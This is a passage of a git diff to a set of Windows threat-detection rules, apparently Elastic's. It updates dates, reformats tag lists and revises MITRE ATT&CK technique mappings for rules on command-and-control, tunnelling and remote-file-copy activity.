Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -124,34 +117,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1125" name = "Video Capture" reference = "https://attack.mitre.org/techniques/T1125/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_winrar_encryption.toml b/rules/windows/collection_winrar_encryption.toml index 076a07172bb..ef15efa4aae 100644 --- a/rules/windows/collection_winrar_encryption.toml +++ b/rules/windows/collection_winrar_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,11 +110,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -125,7 +120,6 @@ id = "T1560.001" name = "Archive via Utility" reference = "https://attack.mitre.org/techniques/T1560/001/" - [rule.threat.tactic] id = "TA0009" name = "Collection" diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml index d2af75605fd..b1817697a24 100644 --- a/rules/windows/command_and_control_certreq_postdata.toml +++ b/rules/windows/command_and_control_certreq_postdata.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -108,22 +108,7 @@ references = ["https://lolbas-project.github.io/lolbas/Binaries/Certreq/"] risk_score = 47 rule_id = "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Command and Control", - "Tactic: Exfiltration", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -135,38 +120,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml index 0c00e93c80e..32761193600 100644 --- a/rules/windows/command_and_control_common_webservices.toml +++ b/rules/windows/command_and_control_common_webservices.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/12" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -339,54 +339,13 @@ network where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" -[[rule.threat.technique]] -id = "T1568" -name = "Dynamic Resolution" -reference = "https://attack.mitre.org/techniques/T1568/" -[[rule.threat.technique.subtechnique]] -id = "T1568.002" -name = "Domain Generation Algorithms" -reference = "https://attack.mitre.org/techniques/T1568/002/" - -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" -[[rule.threat.technique.subtechnique]] -id = "T1090.002" -name = "External Proxy" -reference = "https://attack.mitre.org/techniques/T1090/002/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" -[[rule.threat.technique.subtechnique]] -id = "T1567.001" -name = "Exfiltration to Code Repository" -reference = "https://attack.mitre.org/techniques/T1567/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" - - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml index 7a9bf50f8f0..0b1bd471e05 100644 --- a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml +++ b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,14 +92,18 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1573" name = "Encrypted Channel" reference = "https://attack.mitre.org/techniques/T1573/" +[[rule.threat.technique.subtechnique]] +id = "T1573.002" +name = "Asymmetric Cryptography" +reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml index a9db0f9e470..be7fdce0a18 100644 --- a/rules/windows/command_and_control_iexplore_via_com.toml +++ b/rules/windows/command_and_control_iexplore_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,14 +20,7 @@ name = "Potential Command and Control via Internet Explorer" risk_score = 47 rule_id = "acd611f3-2b93-47b3-a0a3-7723bcc46f6d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -89,31 +82,59 @@ Internet Explorer can be manipulated via the Component Object Model (COM) to ini [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml index e584f93e7a1..78cfe61c520 100644 --- a/rules/windows/command_and_control_outlook_home_page.toml +++ b/rules/windows/command_and_control_outlook_home_page.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ references = [ risk_score = 73 rule_id = "ac5a2759-5c34-440a-b0c4-51fe674611d6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -93,25 +80,17 @@ registry where host.os.type == "windows" and event.action != "deletion" and regi [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.004" name = "Outlook Home Page" reference = "https://attack.mitre.org/techniques/T1137/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml index 0e73d7b7ab7..faf4022a242 100644 --- a/rules/windows/command_and_control_port_forwarding_added_registry.toml +++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,20 +70,7 @@ references = [ risk_score = 47 rule_id = "3535c8bb-3bd5-40f4-ae32-b7cd589d5372" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +82,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml index 14e373d6b5f..4a2eba9d304 100644 --- a/rules/windows/command_and_control_rdp_tunnel_plink.toml +++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,31 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/command_and_control_remcos_rat_iocs.toml b/rules/windows/command_and_control_remcos_rat_iocs.toml index e7563a52d20..41cfecfa7e0 100644 --- a/rules/windows/command_and_control_remcos_rat_iocs.toml +++ b/rules/windows/command_and_control_remcos_rat_iocs.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -53,19 +53,7 @@ references = [ risk_score = 73 rule_id = "d8b2f85a-cf1c-40fc-acf0-bb5d588a8ea6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -91,14 +79,31 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml index 82f163f5d20..d1f4a1a5e14 100644 --- a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml +++ b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -144,20 +144,7 @@ references = ["https://labs.sentinelone.com/living-off-windows-land-a-new-native risk_score = 47 rule_id = "15c0b7a7-9c34-4869-b25b-fa6518414899" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -170,14 +157,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_remote_file_copy_powershell.toml b/rules/windows/command_and_control_remote_file_copy_powershell.toml index a390d17502c..97d01d5bcb5 100644 --- a/rules/windows/command_and_control_remote_file_copy_powershell.toml +++ b/rules/windows/command_and_control_remote_file_copy_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -128,7 +128,7 @@ PowerShell is one of system administrators' main tools for automation, report ro risk_score = 47 rule_id = "33f306e8-417c-411b-965c-c2812d6d3f4d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] type = "eql" query = ''' @@ -161,31 +161,31 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml index 9042a919ec0..fca7770e374 100644 --- a/rules/windows/command_and_control_remote_file_copy_scripts.toml +++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -123,31 +123,26 @@ sequence by host.id, process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_screenconnect_childproc.toml b/rules/windows/command_and_control_screenconnect_childproc.toml index 8ae791c89f0..e23873dfce6 100644 --- a/rules/windows/command_and_control_screenconnect_childproc.toml +++ b/rules/windows/command_and_control_screenconnect_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,20 +65,7 @@ references = [ risk_score = 47 rule_id = "78de1aeb-5225-4067-b8cc-f4a1de8a8546" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -107,14 +94,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml index 53c16e9ff6d..8431bd3c030 100644 --- a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml +++ b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -130,36 +130,18 @@ network where host.os.type == "windows" and event.type == "protocol" and network [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml index 3bb1e29bf23..63bb0f13837 100644 --- a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml +++ b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -124,6 +124,7 @@ file where host.os.type == "windows" and event.type == "creation" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" @@ -134,9 +135,12 @@ id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique.subtechnique]] +id = "T1219.001" +name = "IDE Tunneling" +reference = "https://attack.mitre.org/techniques/T1219/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/windows/command_and_control_tool_transfer_via_curl.toml b/rules/windows/command_and_control_tool_transfer_via_curl.toml index 760413874e8..0ee101aa41c 100644 --- a/rules/windows/command_and_control_tool_transfer_via_curl.toml +++ b/rules/windows/command_and_control_tool_transfer_via_curl.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,14 +108,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/windows/command_and_control_tunnel_yuze.toml b/rules/windows/command_and_control_tunnel_yuze.toml index a3a6314cc2e..d7edec827c7 100644 --- a/rules/windows/command_and_control_tunnel_yuze.toml +++ b/rules/windows/command_and_control_tunnel_yuze.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,6 +86,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/windows/command_and_control_velociraptor_shell_execution.toml b/rules/windows/command_and_control_velociraptor_shell_execution.toml index e3a239e9797..3669963ad8b 100644 --- a/rules/windows/command_and_control_velociraptor_shell_execution.toml +++ b/rules/windows/command_and_control_velociraptor_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,22 +55,7 @@ references = [ risk_score = 47 rule_id = "9aeca498-1e3d-4496-9e12-6ef40047eb23" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Execution", - 